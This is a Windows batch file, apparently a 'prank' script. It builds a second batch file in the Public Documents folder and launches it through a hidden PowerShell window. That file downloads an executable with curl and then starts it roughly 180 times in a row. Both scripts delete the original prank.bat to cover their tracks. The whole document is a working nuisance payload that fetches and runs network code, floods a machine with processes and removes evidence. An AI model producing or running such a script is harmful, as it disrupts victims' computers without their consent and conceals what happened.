echo powershell -window hidden -command "cd C:\Users\Public\Documents" > C:\Users\Public\Documents\minecraft.bat
echo cd %USERPROFILE%/desktop >> C:\Users\Public\Documents\minecraft.bat
echo DEL prank.bat >> C:\Users\Public\Documents\minecraft.bat
echo cd C:\Users\Public\Documents >> C:\Users\Public\Documents\minecraft.bat
echo curl https://launcher.mojang.com/download/Minecraft.exe --output minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
echo minecraft.exe >> C:\Users\Public\Documents\minecraft.bat
C:\Users\Public\Documents\minecraft.bat
DEL /F prank.bat